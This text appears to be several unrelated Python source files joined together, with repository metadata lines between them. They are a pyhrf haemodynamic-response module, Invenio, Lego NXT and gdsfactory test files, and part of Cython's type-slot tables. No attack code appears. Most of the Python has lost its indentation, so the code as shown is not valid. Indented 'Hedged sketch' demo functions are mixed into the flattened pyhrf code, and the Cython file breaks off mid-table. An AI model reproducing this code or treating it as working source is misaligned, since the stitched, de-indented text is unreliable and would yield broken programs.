# Bold # maybe rename as ASL (should be handled afterwards ...
'ctrl_tag_mat' : simbase.build_ctrl_tag_matrix,
'asl_shape' : simbase.calc_asl_shape,
'bold' : simbase.create_asl_from_stim_induced,
}
simu_graph = Pipeline(simulation_steps)
# Compute everything
simu_graph.resolve()
simulation = simu_graph.get_values()
if output_dir is not None:
#simu_graph.save_graph_plot(op.join(output_dir, 'simulation_graph.png'))
simbase.simulation_save_vol_outputs(simulation, output_dir)
# f = open(op.join(output_dir, 'simulation.pck'), 'w')
# cPickle.dump(simulation, f)
# f.close()
return simulation
#### Linearized system to characterize BRF - PRF relationship ####
# def buildOrder1FiniteDiffMatrix_central_alternate(size,dt):
# """
# returns a toeplitz matrix
# for central differences
# """
# #instability in the first few data points when calculating prf (not seen when old form is used)
# from scipy.linalg import toeplitz
# r = np.zeros(size)
# c = np.zeros(size)
# r[1] = .5
# r[size-1] = -.5
# c[1] = -.5
# c[size-1] = .5
# # to fix the last grid point
# D = toeplitz(r,c).T
# D[0,size-1]=0
# D[size-1,0]=0
# D[size-1,size-2]=-1
# D[size-1,size-1]=1
# return D/(2*dt)
def buildOrder1FiniteDiffMatrix_central(size,dt):
"""
    Returns a Toeplitz matrix for central differences.
    To correct for errors on the first and last points
    (due to the fact that there is no rf[-1] or rf[size] to average with):
    - uses the last point to calculate the first, and vice versa
    - this is acceptable because the rf is assumed to begin & end at steady
      state (thus the first and last points should both be zero)
"""
from scipy.linalg import toeplitz
r = np.zeros(size)
c = np.zeros(size)
r[1] = .5
r[size-1] = -.5
c[1] = -.5
c[size-1] = .5
return toeplitz(r,c).T/(2*dt)
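# Hedged sketch (illustrative, not part of the original module): apply the
# central-difference operator to a sampled sine; away from the wrap-corrected
# endpoints the result is proportional to the analytic derivative cos(2*pi*t).
# The overall scale depends on the module's stencil/denominator convention,
# so only the shape is checked here.
def _demo_central_diff():
    dt = .01
    t = np.arange(0., 1., dt)
    D = buildOrder1FiniteDiffMatrix_central(t.size, dt)
    deriv = np.dot(D, np.sin(2 * np.pi * t))
    ref = np.cos(2 * np.pi * t)
    c = np.corrcoef(deriv[2:-2], ref[2:-2])[0, 1]
    assert c > 0.999  # same shape as the analytic derivative
    return deriv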
def plot_calc_hrf(hrf1_simu, hrf1_simu_name, hrf1_calc, hrf1_calc_name,
hrf2_simu, hrf2_simu_name, dt):
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(hrf1_simu.size) * dt #TODO: find non-dt method to do this
simu1 = plt.plot(t, hrf1_simu, label=hrf1_simu_name)
calc1 = plt.plot(t, hrf1_calc, label=hrf1_calc_name)
plt.legend()
plt.title(hrf1_calc_name)
plt.subplot(122)
simu2 = plt.plot(t, hrf2_simu, label=hrf2_simu_name)
plt.plot(t, hrf1_simu, label=hrf1_simu_name)
plt.legend()
plt.title(hrf2_simu_name)
plt.show()
return None
def linear_rf_operator(rf_size, phy_params, dt, calculating_brf=False):
"""
    Calculates the linear operator A needed to convert a BRF to a PRF and
    vice versa:
     prf = (A^{-1}) brf
     brf = (A) prf
    Inputs:
        - rf_size: size of the PRF and/or BRF (assumed to be the same)
        - phy_params: the physiological parameters
        - dt: time resolution of the data
        - calculating_brf: whether to calculate the BRF (return A) or the PRF
          (return the inverse of A)
    Outputs:
        - np.array of shape (rf_size, rf_size): the linear operator to convert HRFs
"""
import numpy as np
tau_m_inv = 1./phy_params['tau_m']
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
from pyhrf.sandbox.physio import buildOrder1FiniteDiffMatrix_central
D = buildOrder1FiniteDiffMatrix_central(rf_size,dt) #numpy matrix
eye = np.matrix(np.eye(rf_size)) #numpy matrix
A3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*eye).I )
A4 = c * (D+tau_m_inv*eye).I - (D+tau_m_inv*eye).I*((1-alpha_w)*alpha_w_inv* tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*eye).I
A = V0 * ( (k1+k2)*A4 + (k3-k2)* A3 )
if (calculating_brf):
return -A.A
else: #calculating_prf
return -(A.I).A
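# Hedged usage sketch (illustrative only): build the linearized operator with
# the Friston 2000 parameters and map a physiologically simulated PRF to its
# approximate BRF counterpart.
def _demo_linear_rf_operator():
    dt = .5
    prf = create_physio_prf(PHY_PARAMS_FRISTON00, response_dt=dt)
    A = linear_rf_operator(prf.size, PHY_PARAMS_FRISTON00, dt,
                           calculating_brf=True)
    brf_approx = np.dot(A, prf)  # brf = A prf under the linearization
    return brf_approx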
def calc_linear_rfs(simu_brf, simu_prf, phy_params, dt, normalized_rfs=True):
"""
    Calculate 'prf given brf' and 'brf given prf' based on a linearization
    around the steady state of the physiological model, as described in Friston 2000.
Input:
- simu_brf, simu_prf: brf and prf from the physiological simulation
from which you wish to calculate the respective
prf and brf.
Assumed to be of size (1,hrf.size)
- phy_params
- normalized_rfs: set to True if simu_hrfs are normalized
Output:
- calc_brf, calc_prf: np.arrays of shape (hrf.size, 1)
- q_linear, v_linear: q and v calculated according to the linearized model
Note:
These calculations do not account for any rescaling between brf and prf.
This means the input simu_brf, simu_prf should NOT be rescaled.
    **Warning**:
       - this function assumes prf.size == brf.size and uses this to build D, I
       - if making modifications:
         calc_brf, calc_prf have a truncation error (due to the finite
         difference matrix used) on the order of O(dt)^2. If for any reason a
         hack is later implemented to set the y-intercepts of brf_calc,
         prf_calc to zero by setting the first row of X4, X3 = 0, this will
         raise a singular matrix error in the calculation of calc_prf (due to
         the X.I command), so this error is helpful in this case.
"""
D = buildOrder1FiniteDiffMatrix_central(simu_prf.size,dt) #numpy matrix
I = np.matrix(np.eye(simu_prf.size)) #numpy matrix
    #TODO: eliminate prf.size dependency
tau_m = phy_params['tau_m']
tau_m_inv = 1./tau_m #when tau_m=1, singular matrix formed by (D+tau_m_inv*I)
alpha_w = phy_params['alpha_w']
alpha_w_inv = 1./phy_params['alpha_w']
E0 = phy_params['E0']
V0 = phy_params['V0']
k1 = phy_params['k1']
k2 = phy_params['k2']
k3 = phy_params['k3']
c = tau_m_inv * ( 1 + (1-E0)*np.log(1-E0)/E0 )
#transform to (hrf.size,1) matrix for calcs
simu_prf = np.matrix(simu_prf).transpose()
simu_brf = np.matrix(simu_brf).transpose()
X3 = tau_m_inv*( (D + (alpha_w_inv*tau_m_inv)*I).I )
X4= c *(D+tau_m_inv*I).I - (D+tau_m_inv*I).I*((1-alpha_w)*alpha_w_inv*\
tau_m_inv**2)* (D+alpha_w_inv*tau_m_inv*I).I
X = V0 * ( (k1+k2)*X4 + (k3-k2)* X3 )
#for error checking
q_linear = 1-X4*(-simu_prf)
v_linear = 1-X3*(-simu_prf)
calc_brf = X*(-simu_prf)
calc_prf = -X.I*simu_brf
#convert to np.arrays
calc_prf = calc_prf.A
calc_brf = calc_brf.A
q_linear = q_linear.A
v_linear = v_linear.A
if normalized_rfs:
calc_prf /= (calc_prf**2).sum()**.5
calc_brf /= (calc_brf**2).sum()**.5
return calc_brf, calc_prf, q_linear, v_linear
def run_calc_linear_rfs():
"""
Choose physio parameters
Choose to generate simu_rfs from multiple or single stimulus
TODO:
- figure out why there is an issue that perf_stim_induced is much greater than bold_stim_induced
- figure out why when simu_brf=bold_stim_induced_rescaled,
calc_brf is so small it appears to be 0
"""
phy_params = PHY_PARAMS_FRISTON00
#phy_params = PHY_PARAMS_KHALIDOV11
    multiple_stimulus_rf = False  # if True, test calculations on RFs simulated
                                  # from a full paradigm; else test on a single
                                  # stimulus RF
if multiple_stimulus_rf:
simu_items = simulate_asl_full_physio()
#for rfs, rows are rfs, columns are different instances
choose_rf = 1 # choose any number between 0 and simu_rf.shape[1]
simu_prf = simu_items['perf_stim_induced'][:,choose_rf].T - \
simu_items['perf_stim_induced'][0,choose_rf]
simu_brf = simu_items['bold_stim_induced'][:,choose_rf].T
dt = simu_items['dt']
q_dynamic = simu_items['hbr'][:,choose_rf]
v_dynamic = simu_items['cbv'][:,choose_rf]
normalized_rfs = False
        # NB: if normalized simulated BRFs and PRFs are being used, then the
        # comparison between v and q, linear vs. dynamic, is no longer valid.
        # Disregard that plot.
else:
dt = .05
duration = 25.
simu_prf, q_unused, v_unused = create_physio_prf(phy_params,
response_dt=dt, response_duration=duration,
return_prf_q_v=True)
simu_brf, q_dynamic, v_dynamic = create_physio_brf(phy_params,
response_dt=dt, response_duration=duration,
return_brf_q_v=True)
normalized_rfs = True
## deletable - no use for rescaling here
#rescaling irrelevant to this simulation
#simu_brf_rescale = rescale_bold_over_perf(simu_brf, simu_prf)
#simu_brf = simu_brf_rescale
#in testing: assert( simu_brf.shape == simu_prf_shape)?
##
calc_brf, calc_prf, q_linear, v_linear = calc_linear_rfs(simu_brf, simu_prf,
phy_params, dt,
normalized_rfs)
plot_results=True
if plot_results:
plot_calc_hrf(simu_brf, 'simulated brf', calc_brf, 'calculated brf',
simu_prf, 'simulated prf', dt)
plot_calc_hrf(simu_prf, 'simulated prf', calc_prf, 'calculated prf',
simu_brf, 'simulated brf', dt)
#for debugging
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(121)
t = np.arange(v_linear.size) * dt #TODO: find non-dt method to do this
plt.plot(t,v_linear, label='v linear')
plt.plot(t, v_dynamic, label='v dynamic')
plt.legend()
plt.title('v')
plt.subplot(122)
plt.plot(t,q_linear, label='q linear')
plt.plot(t, q_dynamic, label='q dynamic')
plt.legend()
plt.title('q')
plt.show()
# to see calc_brf and calc_prf on same plot (if calculating both)
plt.figure()
plt.plot(t, calc_brf, label='calculated brf')
plt.plot(t, calc_prf, label='calculated prf')
plt.legend()
plt.title('calculated hrfs')
return None
| gpl-3.0 | 5,536,194,127,172,453,000 | 35.581423 | 235 | 0.563246 | false |
labordoc/labordoc-next | modules/miscutil/lib/plotextractor_regression_tests.py | 1 | 2132 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Regression tests for the plotextract script."""
__revision__ = "$Id$"
import os
from invenio.config import CFG_TMPDIR, CFG_SITE_URL
from invenio.testutils import make_test_suite, run_test_suite, InvenioTestCase
class GetDefaultsTest(InvenioTestCase):
"""Test function to get default values."""
def setUp(self):
self.arXiv_id = "arXiv:astro-ph_0104076"
self.tarball = "%s/2001/04/arXiv:astro-ph_0104076/arXiv:astro-ph_0104076" % (CFG_TMPDIR,)
def test_get_defaults(self):
"""plotextractor - get defaults"""
from invenio.shellutils import run_shell_command
from invenio.plotextractor import get_defaults
sdir_should_be = os.path.join(CFG_TMPDIR, self.arXiv_id + '_plots')
refno_should_be = "15" # Note: For ATLANTIS DEMO site
sdir, refno = get_defaults(tarball=self.tarball, sdir=None, refno_url=CFG_SITE_URL)
if sdir != None:
run_shell_command("rm -rf %s" % (sdir,))
self.assertTrue(sdir == sdir_should_be, \
"didn\'t get correct default scratch dir")
self.assertTrue(refno == refno_should_be, \
'didn\'t get correct default reference number')
TEST_SUITE = make_test_suite(GetDefaultsTest)
if __name__ == "__main__":
run_test_suite(TEST_SUITE, warn_user=True)
| gpl-2.0 | 5,976,011,825,349,743,000 | 39.226415 | 97 | 0.675422 | false |
snim2/nxt-turtle | tests/test-sensors.py | 1 | 1224 | """
Test the sensors on the Lego NXT.
Copyright (C) Sarah Mount, 2008.
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
"""
import nxt_turtle
__author__ = 'Sarah Mount <[email protected]>'
__date__ = 'March 2008'
if __name__ == '__main__':
turtle = nxt_turtle.LegoTurtle()
print 'Sound level: ', turtle.get_sound()
print 'Light level: ', turtle.get_light()
print 'UltraSound level:', turtle.get_ultrasound()
if turtle.get_touch():
print 'Touch sensor: On'
else: print 'Touch sensor: Off'
turtle.close()
| gpl-2.0 | -2,247,795,392,501,042,400 | 33 | 78 | 0.694444 | false |
gdsfactory/gdsfactory | pp/drc/test_width.py | 1 | 1250 | from typing import Tuple
import pp
from pp.drc import check_width
def test_wmin_failing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 + 10 # component edges are smaller than min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# r = check_width(gdspath, min_width=min_width, layer=layer)
# print(check_width(gdspath, min_width=min_width, layer=layer))
assert check_width(gdspath, min_width=min_width, layer=layer) == 2
assert check_width(c, min_width=min_width, layer=layer) == 2
def test_wmin_passing(layer: Tuple[int, int] = (1, 0)) -> None:
w = 50
min_width = 50 - 10 # component edges are bigger than the min_width
c = pp.components.rectangle(size=(w, w), layer=layer)
gdspath = c.write_gds("wmin.gds")
# print(check_width(c, min_width=min_width, layer=layer))
# assert check_width(gdspath, min_width=min_width, layer=layer) is None
# assert check_width(c, min_width=min_width, layer=layer) is None
assert check_width(gdspath, min_width=min_width, layer=layer) == 0
assert check_width(c, min_width=min_width, layer=layer) == 0
if __name__ == "__main__":
# test_wmin_failing()
test_wmin_passing()
| mit | 7,011,641,545,974,468,000 | 35.764706 | 75 | 0.6608 | false |
rguillebert/CythonCTypesBackend | Cython/Compiler/TypeSlots.py | 1 | 30865 | #
# Tables describing slots in the CPython type object
# and associated know-how.
#
import Naming
import PyrexTypes
import StringEncoding
invisible = ['__cinit__', '__dealloc__', '__richcmp__',
'__nonzero__', '__bool__']
class Signature(object):
# Method slot signature descriptor.
#
# has_dummy_arg boolean
# has_generic_args boolean
# fixed_arg_format string
# ret_format string
# error_value string
#
# The formats are strings made up of the following
# characters:
#
# 'O' Python object
# 'T' Python object of the type of 'self'
# 'v' void
# 'p' void *
# 'P' void **
# 'i' int
# 'b' bint
# 'I' int *
# 'l' long
# 'f' float
# 'd' double
# 'h' Py_hash_t
# 'z' Py_ssize_t
# 'Z' Py_ssize_t *
# 's' char *
# 'S' char **
# 'r' int used only to signal exception
# 'B' Py_buffer *
# '-' dummy 'self' argument (not used)
# '*' rest of args passed as generic Python
# arg tuple and kw dict (must be last
# char in format string)
format_map = {
'O': PyrexTypes.py_object_type,
'v': PyrexTypes.c_void_type,
'p': PyrexTypes.c_void_ptr_type,
'P': PyrexTypes.c_void_ptr_ptr_type,
'i': PyrexTypes.c_int_type,
'b': PyrexTypes.c_bint_type,
'I': PyrexTypes.c_int_ptr_type,
'l': PyrexTypes.c_long_type,
'f': PyrexTypes.c_float_type,
'd': PyrexTypes.c_double_type,
'h': PyrexTypes.c_py_hash_t_type,
'z': PyrexTypes.c_py_ssize_t_type,
'Z': PyrexTypes.c_py_ssize_t_ptr_type,
's': PyrexTypes.c_char_ptr_type,
'S': PyrexTypes.c_char_ptr_ptr_type,
'r': PyrexTypes.c_returncode_type,
'B': PyrexTypes.c_py_buffer_ptr_type,
# 'T', '-' and '*' are handled otherwise
# and are not looked up in here
}
type_to_format_map = dict([(type_, format_)
for format_, type_ in format_map.iteritems()])
error_value_map = {
'O': "NULL",
'T': "NULL",
'i': "-1",
'b': "-1",
'l': "-1",
'r': "-1",
'h': "-1",
'z': "-1",
}
def __init__(self, arg_format, ret_format):
self.has_dummy_arg = 0
self.has_generic_args = 0
if arg_format[:1] == '-':
self.has_dummy_arg = 1
arg_format = arg_format[1:]
if arg_format[-1:] == '*':
self.has_generic_args = 1
arg_format = arg_format[:-1]
self.fixed_arg_format = arg_format
self.ret_format = ret_format
self.error_value = self.error_value_map.get(ret_format, None)
self.is_staticmethod = False
def num_fixed_args(self):
return len(self.fixed_arg_format)
def is_self_arg(self, i):
# argument is 'self' for methods or 'class' for classmethods
return self.fixed_arg_format[i] == 'T'
def returns_self_type(self):
# return type is same as 'self' argument type
return self.ret_format == 'T'
def fixed_arg_type(self, i):
return self.format_map[self.fixed_arg_format[i]]
def return_type(self):
return self.format_map[self.ret_format]
def format_from_type(self, arg_type):
if arg_type.is_pyobject:
arg_type = PyrexTypes.py_object_type
return self.type_to_format_map[arg_type]
def exception_value(self):
return self.error_value_map.get(self.ret_format)
def function_type(self, self_arg_override=None):
# Construct a C function type descriptor for this signature
args = []
for i in xrange(self.num_fixed_args()):
if self_arg_override is not None and self.is_self_arg(i):
assert isinstance(self_arg_override, PyrexTypes.CFuncTypeArg)
args.append(self_arg_override)
else:
arg_type = self.fixed_arg_type(i)
args.append(PyrexTypes.CFuncTypeArg("", arg_type, None))
if self_arg_override is not None and self.returns_self_type():
ret_type = self_arg_override.type
else:
ret_type = self.return_type()
exc_value = self.exception_value()
return PyrexTypes.CFuncType(ret_type, args, exception_value = exc_value)
def method_flags(self):
if self.ret_format == "O":
full_args = self.fixed_arg_format
if self.has_dummy_arg:
full_args = "O" + full_args
if full_args in ["O", "T"]:
if self.has_generic_args:
return [method_varargs, method_keywords]
else:
return [method_noargs]
elif full_args in ["OO", "TO"] and not self.has_generic_args:
return [method_onearg]
if self.is_staticmethod:
return [method_varargs, method_keywords]
return None
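# Hedged sketch (illustrative, not part of the original module): a Signature
# of "OO" -> "O" describes a slot like nb_add, i.e. a C function taking two
# PyObject* arguments and returning a PyObject*, where returning NULL signals
# an exception.
def _demo_signature():
    sig = Signature("OO", "O")
    assert sig.num_fixed_args() == 2
    assert sig.error_value == "NULL"
    return sig.function_type()  # a PyrexTypes.CFuncType describing the slot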
class SlotDescriptor(object):
# Abstract base class for type slot descriptors.
#
# slot_name string Member name of the slot in the type object
# is_initialised_dynamically Is initialised by code in the module init function
# py3 Indicates presence of slot in Python 3
# py2 Indicates presence of slot in Python 2
    #  ifdef           Full #ifdef string that slot is wrapped in. Using this causes py3, py2 and flags to be ignored.
def __init__(self, slot_name, dynamic=0,
py3=True, py2=True, ifdef=None):
self.slot_name = slot_name
self.is_initialised_dynamically = dynamic
self.ifdef = ifdef
self.py3 = py3
self.py2 = py2
def preprocessor_guard_code(self):
ifdef = self.ifdef
py2 = self.py2
py3 = self.py3
guard = None
if ifdef:
guard = ("#if %s" % ifdef)
elif not py3 or py3 == '<RESERVED>':
guard = ("#if PY_MAJOR_VERSION < 3")
elif not py2:
guard = ("#if PY_MAJOR_VERSION >= 3")
return guard
def generate(self, scope, code):
if self.is_initialised_dynamically:
value = 0
else:
value = self.slot_code(scope)
preprocessor_guard = self.preprocessor_guard_code()
if preprocessor_guard:
code.putln(preprocessor_guard)
code.putln("%s, /*%s*/" % (value, self.slot_name))
if self.py3 == '<RESERVED>':
code.putln("#else")
code.putln("0, /*reserved*/")
if preprocessor_guard:
code.putln("#endif")
# Some C implementations have trouble statically
# initialising a global with a pointer to an extern
# function, so we initialise some of the type slots
# in the module init function instead.
def generate_dynamic_init_code(self, scope, code):
if self.is_initialised_dynamically:
value = self.slot_code(scope)
if value != "0":
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
value
)
)
class FixedSlot(SlotDescriptor):
# Descriptor for a type slot with a fixed value.
#
# value string
def __init__(self, slot_name, value, py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.value = value
def slot_code(self, scope):
return self.value
class EmptySlot(FixedSlot):
# Descriptor for a type slot whose value is always 0.
def __init__(self, slot_name, py3=True, py2=True, ifdef=None):
FixedSlot.__init__(self, slot_name, "0", py3=py3, py2=py2, ifdef=ifdef)
class MethodSlot(SlotDescriptor):
# Type slot descriptor for a user-definable method.
#
# signature Signature
# method_name string The __xxx__ name of the method
# alternatives [string] Alternative list of __xxx__ names for the method
def __init__(self, signature, slot_name, method_name, fallback=None,
py3=True, py2=True, ifdef=None):
SlotDescriptor.__init__(self, slot_name, py3=py3, py2=py2, ifdef=ifdef)
self.signature = signature
self.slot_name = slot_name
self.method_name = method_name
self.alternatives = []
method_name_to_slot[method_name] = self
#
if fallback:
self.alternatives.append(fallback)
for alt in (self.py2, self.py3):
if isinstance(alt, (tuple, list)):
slot_name, method_name = alt
self.alternatives.append(method_name)
method_name_to_slot[method_name] = self
def slot_code(self, scope):
entry = scope.lookup_here(self.method_name)
if entry and entry.func_cname:
return entry.func_cname
for method_name in self.alternatives:
entry = scope.lookup_here(method_name)
if entry and entry.func_cname:
return entry.func_cname
return "0"
class InternalMethodSlot(SlotDescriptor):
# Type slot descriptor for a method which is always
# synthesized by Cython.
#
# slot_name string Member name of the slot in the type object
def __init__(self, slot_name, **kargs):
SlotDescriptor.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
return scope.mangle_internal(self.slot_name)
class GCDependentSlot(InternalMethodSlot):
# Descriptor for a slot whose value depends on whether
# the type participates in GC.
def __init__(self, slot_name, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
def slot_code(self, scope):
if not scope.needs_gc():
return "0"
if not scope.has_pyobject_attrs:
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class ConstructorSlot(InternalMethodSlot):
# Descriptor for tp_new and tp_dealloc.
def __init__(self, slot_name, method, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.method = method
def slot_code(self, scope):
if scope.parent_type.base_type \
and not scope.has_pyobject_attrs \
and not scope.lookup_here(self.method):
# if the type does not have object attributes, it can
# delegate GC methods to its parent - iff the parent
# functions are defined in the same module
parent_type_scope = scope.parent_type.base_type.scope
if scope.parent_scope is parent_type_scope.parent_scope:
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return self.slot_code(parent_type_scope)
return InternalMethodSlot.slot_code(self, scope)
class SyntheticSlot(InternalMethodSlot):
# Type slot descriptor for a synthesized method which
# dispatches to one or more user-defined methods depending
# on its arguments. If none of the relevant methods are
# defined, the method will not be synthesized and an
# alternative default value will be placed in the type
# slot.
def __init__(self, slot_name, user_methods, default_value, **kargs):
InternalMethodSlot.__init__(self, slot_name, **kargs)
self.user_methods = user_methods
self.default_value = default_value
def slot_code(self, scope):
if scope.defines_any(self.user_methods):
return InternalMethodSlot.slot_code(self, scope)
else:
return self.default_value
class TypeFlagsSlot(SlotDescriptor):
# Descriptor for the type flags slot.
def slot_code(self, scope):
value = "Py_TPFLAGS_DEFAULT|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER"
if not scope.parent_type.is_final_type:
value += "|Py_TPFLAGS_BASETYPE"
if scope.needs_gc():
value += "|Py_TPFLAGS_HAVE_GC"
return value
class DocStringSlot(SlotDescriptor):
# Descriptor for the docstring slot.
def slot_code(self, scope):
if scope.doc is not None:
if scope.doc.is_unicode:
doc = scope.doc.utf8encode()
else:
doc = scope.doc.byteencode()
return '__Pyx_DOCSTR("%s")' % StringEncoding.escape_byte_string(doc)
else:
return "0"
class SuiteSlot(SlotDescriptor):
# Descriptor for a substructure of the type object.
#
# sub_slots [SlotDescriptor]
def __init__(self, sub_slots, slot_type, slot_name):
SlotDescriptor.__init__(self, slot_name)
self.sub_slots = sub_slots
self.slot_type = slot_type
substructures.append(self)
def substructure_cname(self, scope):
return "%s%s_%s" % (Naming.pyrex_prefix, self.slot_name, scope.class_name)
def slot_code(self, scope):
return "&%s" % self.substructure_cname(scope)
def generate_substructure(self, scope, code):
code.putln("")
code.putln(
"static %s %s = {" % (
self.slot_type,
self.substructure_cname(scope)))
for slot in self.sub_slots:
slot.generate(scope, code)
code.putln("};")
substructures = [] # List of all SuiteSlot instances
class MethodTableSlot(SlotDescriptor):
# Slot descriptor for the method table.
def slot_code(self, scope):
return scope.method_table_cname
class MemberTableSlot(SlotDescriptor):
# Slot descriptor for the table of Python-accessible attributes.
def slot_code(self, scope):
return "0"
class GetSetSlot(SlotDescriptor):
# Slot descriptor for the table of attribute get & set methods.
def slot_code(self, scope):
if scope.property_entries:
return scope.getset_table_cname
else:
return "0"
class BaseClassSlot(SlotDescriptor):
# Slot descriptor for the base class slot.
def __init__(self, name):
SlotDescriptor.__init__(self, name, dynamic = 1)
def generate_dynamic_init_code(self, scope, code):
base_type = scope.parent_type.base_type
if base_type:
code.putln("%s.%s = %s;" % (
scope.parent_type.typeobj_cname,
self.slot_name,
base_type.typeptr_cname))
# The following dictionary maps __xxx__ method names to slot descriptors.
method_name_to_slot = {}
## The following slots are (or could be) initialised with an
## extern function pointer.
#
#slots_initialised_from_extern = (
# "tp_free",
#)
#------------------------------------------------------------------------------------------
#
# Utility functions for accessing slot table data structures
#
#------------------------------------------------------------------------------------------
def get_special_method_signature(name):
# Given a method name, if it is a special method,
# return its signature, else return None.
slot = method_name_to_slot.get(name)
if slot:
return slot.signature
else:
return None
def get_property_accessor_signature(name):
# Return signature of accessor for an extension type
# property, else None.
return property_accessor_signatures.get(name)
def get_base_slot_function(scope, slot):
# Returns the function implementing this slot in the baseclass.
# This is useful for enabling the compiler to optimize calls
# that recursively climb the class hierarchy.
base_type = scope.parent_type.base_type
if scope.parent_scope is base_type.scope.parent_scope:
parent_slot = slot.slot_code(base_type.scope)
if parent_slot != '0':
entry = scope.parent_scope.lookup_here(scope.parent_type.base_type.name)
if entry.visibility != 'extern':
return parent_slot
return None
#------------------------------------------------------------------------------------------
#
# Signatures for generic Python functions and methods.
#
#------------------------------------------------------------------------------------------
pyfunction_signature = Signature("-*", "O")
pymethod_signature = Signature("T*", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for simple Python functions.
#
#------------------------------------------------------------------------------------------
pyfunction_noargs = Signature("-", "O")
pyfunction_onearg = Signature("-O", "O")
#------------------------------------------------------------------------------------------
#
# Signatures for the various kinds of function that
# can appear in the type object and its substructures.
#
#------------------------------------------------------------------------------------------
unaryfunc = Signature("T", "O") # typedef PyObject * (*unaryfunc)(PyObject *);
binaryfunc = Signature("OO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ibinaryfunc = Signature("TO", "O") # typedef PyObject * (*binaryfunc)(PyObject *, PyObject *);
ternaryfunc = Signature("OOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
iternaryfunc = Signature("TOO", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
callfunc = Signature("T*", "O") # typedef PyObject * (*ternaryfunc)(PyObject *, PyObject *, PyObject *);
inquiry = Signature("T", "i") # typedef int (*inquiry)(PyObject *);
lenfunc = Signature("T", "z") # typedef Py_ssize_t (*lenfunc)(PyObject *);
# typedef int (*coercion)(PyObject **, PyObject **);
intargfunc = Signature("Ti", "O") # typedef PyObject *(*intargfunc)(PyObject *, int);
ssizeargfunc = Signature("Tz", "O") # typedef PyObject *(*ssizeargfunc)(PyObject *, Py_ssize_t);
intintargfunc = Signature("Tii", "O") # typedef PyObject *(*intintargfunc)(PyObject *, int, int);
ssizessizeargfunc = Signature("Tzz", "O") # typedef PyObject *(*ssizessizeargfunc)(PyObject *, Py_ssize_t, Py_ssize_t);
intobjargproc = Signature("TiO", 'r') # typedef int(*intobjargproc)(PyObject *, int, PyObject *);
ssizeobjargproc = Signature("TzO", 'r') # typedef int(*ssizeobjargproc)(PyObject *, Py_ssize_t, PyObject *);
intintobjargproc = Signature("TiiO", 'r') # typedef int(*intintobjargproc)(PyObject *, int, int, PyObject *);
ssizessizeobjargproc = Signature("TzzO", 'r') # typedef int(*ssizessizeobjargproc)(PyObject *, Py_ssize_t, Py_ssize_t, PyObject *);
intintargproc = Signature("Tii", 'r')
ssizessizeargproc = Signature("Tzz", 'r')
objargfunc = Signature("TO", "O")
objobjargproc = Signature("TOO", 'r') # typedef int (*objobjargproc)(PyObject *, PyObject *, PyObject *);
readbufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*readbufferproc)(PyObject *, Py_ssize_t, void **);
writebufferproc = Signature("TzP", "z") # typedef Py_ssize_t (*writebufferproc)(PyObject *, Py_ssize_t, void **);
segcountproc = Signature("TZ", "z") # typedef Py_ssize_t (*segcountproc)(PyObject *, Py_ssize_t *);
charbufferproc = Signature("TzS", "z") # typedef Py_ssize_t (*charbufferproc)(PyObject *, Py_ssize_t, char **);
objargproc = Signature("TO", 'r') # typedef int (*objobjproc)(PyObject *, PyObject *);
# typedef int (*visitproc)(PyObject *, void *);
# typedef int (*traverseproc)(PyObject *, visitproc, void *);
destructor = Signature("T", "v") # typedef void (*destructor)(PyObject *);
# printfunc = Signature("TFi", 'r') # typedef int (*printfunc)(PyObject *, FILE *, int);
# typedef PyObject *(*getattrfunc)(PyObject *, char *);
getattrofunc = Signature("TO", "O") # typedef PyObject *(*getattrofunc)(PyObject *, PyObject *);
# typedef int (*setattrfunc)(PyObject *, char *, PyObject *);
